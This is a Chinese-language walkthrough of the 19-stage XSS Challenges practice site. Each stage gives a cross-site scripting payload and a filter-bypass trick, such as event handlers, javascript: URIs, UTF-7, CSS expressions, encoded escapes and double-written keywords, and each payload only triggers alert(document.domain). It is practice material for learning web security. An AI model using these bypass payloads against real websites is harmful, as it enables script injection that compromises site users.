XSS Challenges

一个xss练手的小平台 http://xss-quiz.int21h.jp/

一共19关，每一关根据提示执行js ： alert(document.domian);

第一关

直接插入测试

<script>alert(document.domain)</script>

第二关

直接插入测试，并没有弹框，查看源码，我们需要闭合标签

<script>alert(document.domain)</script>

修改payload测试，成功弹窗

"><script>alert(document.domain)</script>

第三关

提示输入点不止一处，抓包，修改p2参数为

<script>alert(document.domain)</script>

成功弹窗

第四关

老样子，抓包，发现隐藏参数p3，修改为

"><script>alert(document.domain)</script>

成功弹窗

第五关

修改 maxlength 的值，使用 payload 成功弹窗

"><script>alert(document.domain)</script>

第六关

使用payload发现 < > 被HTML实体编码

"><script>alert(document.domain)</script>

使用引号 “ 闭合添加标签属性，点击触发弹窗

" onclick=alert(document.domain)

第七关

与第六关类似，并且也过滤了双引号无法闭合逃脱双引号

使用空格可以分隔属性，和第六关payload一样

" onclick=alert(document.domain)

第八关

输入URL：

在a标签中构造javascript协议,点击触发

javascript:alert(document.domain);

第九关

这一关需要使用 IE浏览器将payload构造为 UTF-7编码网上说 ie7 或 ie8 - - 本地测试都没有复现

payload

+/v8 +ACI- onmouseover=alert(d+AG8AYw-u+AG0-en+AHQALg-d+AG8AbQBh-in)+AD4-

所以直接简单粗暴

第十关

使用payload，domain被替换为空

" onclick=alert(document.domain)

双写绕过：

" onclick=alert(document.dodomainmain)

第十一关

转义 script on... style

插入a标签绕过：payload中 script 中间插入，
，空格等不可见字符对script进行分割，让正则匹配不到

"><a href="javascr ipt:alert(document.domain);">12</a>

第十二关

过滤了尖括号、双引号、空格

利用IE浏览器特性 反引号 ` 解析为引号构造payload

``onmouseover=alert(document.domain);

第十三关

同样，过滤了尖括号和双引号再次利用IE浏览器，IE11无法执行，IE8测试通过

xss:expr/*XSS*/ession(alert(document.domain));

第十四关

和上一关类似，把url,script,eval,expression关键字都替换为了xxx。通过注释符号 \0 绕过 ie8测试通过

xss:expr\0ession(alert(document.domain));
xss:expr/**/ession(alert(document.domain));

第十五关

js dom 环境 js 可解码 16、8等进制 Unicode编码，环境转义了反斜杠 \ 双写绕过构造payload

16进制编码   \\x3cscript\\x3ealert(document.domain);\\x3c/script\\x3e
Unicode编码  \\u003cscript\\u003ealert(document.domain);\\u003c/script\\u003e

第十六关

把\\x 替换成了\\\\x，js编码又不止16进制，还有八进制，unicode编码

使用Unicode编码绕过

Unicode编码  \\u003cscript\\u003ealert(document.domain);\\u003c/script\\u003e

第十七关

思路类似于宽字节注入，利用特殊字节吃掉双引号抓包

p1=1%A7&p2=+onmouseover%3Dalert%28document.domain%29%3B+%A7

本地IE6 未测试成功 console暴力过关

第十八关

将每个字符的二进制最高位置为1，然后再转为16进制

"><script>alert(document.domain)</scirpt>

就转换为

%A2%BE%BCscript%BEalert(document.domain);%BC/script%BE

网上说IE5 6 可行，本地IE6测试未复现成功

第十九关

Twitter漏洞在IE8 测试未成功

#!javascript:alert(document.domain)

直接暴力 console，ok 成功模拟过关 ~

XSS Challenges相关推荐

XSS Challenges闯关1-6
第一关: 靶场链接:XSS Challenges (by yamagata21) - Stage #1 第一关截图:(翻译为中文后) 选中Hint查看提示:显示非常容易,但是图中显示必须要用alert ...
xss challenges闯关详细（6-10）
XSS Challenges (by yamagata21) - Stage #1 目录一.第六关二.第七关三.第八关四.第九关五.第十关一.第六关输入good man测试回显位置,输 ...
XSS Challenges stage#1-10闯关详解
XSS Challenges stage1-10闯关详解文章目录 XSS Challenges stage1-10闯关详解 0x01 xss challenges 闯关环境准备 1.XSS chal ...
XSS学习笔记：XSS Challenges 1-19通关全详解
前言学习下XSS 主要是XSS Challenges 平台共19关模仿真实xss挖洞的情景,用浏览器中的f12中搜索,找出我们控制的代码所在的位置思考那些个位置哪个或哪几个位置可以被注入我们想 ...
XSS入门 XSS Challenges靶场搭建/前五关/基础教程
前面写了很多XSS漏洞的利用,这一章开始重点在XSS漏洞的挖掘和如何注入script代码上,和sql注入相类似目录一.实验环境--XSS Challenges 二.探测XSS过程第一关第二关 ...
黑客之XSS注入练手：XSS Challenges通关指南
本文目录: [TOC] 一.XSS Challenges介绍靶场地址:http://xss-quiz.int21h.jp/ 相对于别的靶场来说,这是一个模拟真实环境的xss平台,页面不会给出任何提示 ...
XSS练习平台【XSS Challenges】
以下来自XSS练习平台----XSS Challenges 这个练习平台没有像alert(1)to win类似的平台一样会给出关键的源代码,并且会在页面给予反馈.这是一个模仿真实xss挖洞的情景,在X ...
XSS Challenges xss-quiz.int21h.jp
概述: https://xss-quiz.int21h.jp/ Stage #1 payload: <script>alert(document.domain);</script&g ...
XSS challenges闯关笔记
文章目录 stage-1 没有过滤的XSS stage-2 标签属性中的XSS stage-3 选择列表中的XSS stage-4 隐藏提交参数中的XSS stage-5 限制输入长度的XSS sta ...

XSS Challenges

XSS Challenges相关推荐

最新文章

热门文章